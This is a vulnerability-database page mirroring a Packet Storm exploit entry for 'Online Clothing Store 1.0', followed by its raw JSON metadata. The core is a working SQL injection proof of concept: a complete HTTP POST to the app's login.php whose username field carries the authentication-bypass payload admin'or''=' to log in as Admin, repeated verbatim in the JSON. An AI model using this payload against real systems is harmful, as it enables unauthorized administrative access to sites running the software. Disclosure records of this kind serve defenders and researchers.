Search...

Online Clothing Store 1.0 SQL Injection

2020-05-06T00:00:00

ID PACKETSTORM:157583
Type packetstorm
Reporter Sushant Kamble
Modified 2020-05-06T00:00:00

Description

                                        
                                            `# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection  
# Date: 2020-05-05  
# Exploit Author: Sushant Kamble  
# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html  
# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip  
# Version: 1.0  
# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4  
  
---------------------------------------------------------------------------------  
  
#parameter Vulnerable: username  
# Injected Request  
POST /online%20Clothing%20Store/login.php HTTP/1.1   
Host: localhost  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Content-Type: application/x-www-form-urlencoded  
Content-Length: 55  
Origin: http://localhost  
Connection: close  
Referer: http://localhost/online%20Clothing%20Store/  
Cookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7  
Upgrade-Insecure-Requests: 1  
  
txtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login  
`

JSON Vulners Source

Initial Source

{"id": "PACKETSTORM:157583", "type": "packetstorm", "bulletinFamily": "exploit", "title": "Online Clothing Store 1.0 SQL Injection", "description": "", "published": "2020-05-06T00:00:00", "modified": "2020-05-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "href": "https://packetstormsecurity.com/files/157583/Online-Clothing-Store-1.0-SQL-Injection.html", "reporter": "Sushant Kamble", "references": [], "cvelist": [], "lastseen": "2020-05-07T01:31:57", "viewCount": 51, "enchantments": {"dependencies": {"references": [], "modified": "2020-05-07T01:31:57", "rev": 2}, "score": {"value": -0.2, "vector": "NONE", "modified": "2020-05-07T01:31:57", "rev": 2}, "vulnersScore": -0.2}, "sourceHref": "https://packetstormsecurity.com/files/download/157583/onlineclothingstore10-sql.txt", "sourceData": "`# Exploit Title: Online Clothing Store 1.0 - 'username' SQL Injection \n# Date: 2020-05-05 \n# Exploit Author: Sushant Kamble \n# Vendor Homepage: https://www.sourcecodester.com/php/14185/online-clothing-store.html \n# Software Link: https://www.sourcecodester.com/sites/default/files/download/razormist/online-clothing-store_0.zip \n# Version: 1.0 \n# Tested On: Windows 10 Pro 10.0.18363 N/A Build 18363 + XAMPP V3.2.4 \n \n--------------------------------------------------------------------------------- \n \n#parameter Vulnerable: username \n# Injected Request \nPOST /online%20Clothing%20Store/login.php HTTP/1.1 \nHost: localhost \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) Gecko/20100101 Firefox/75.0 \nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 \nAccept-Language: en-US,en;q=0.5 \nAccept-Encoding: gzip, deflate \nContent-Type: application/x-www-form-urlencoded \nContent-Length: 55 \nOrigin: http://localhost \nConnection: close \nReferer: http://localhost/online%20Clothing%20Store/ \nCookie: PHPSESSID=shu3nbnsdkb4nb73iips4jkrn7 \nUpgrade-Insecure-Requests: 1 \n \ntxtUserName=admin'or''='&txtPassword=anything&rdType=Admin&button=Login \n`\n"}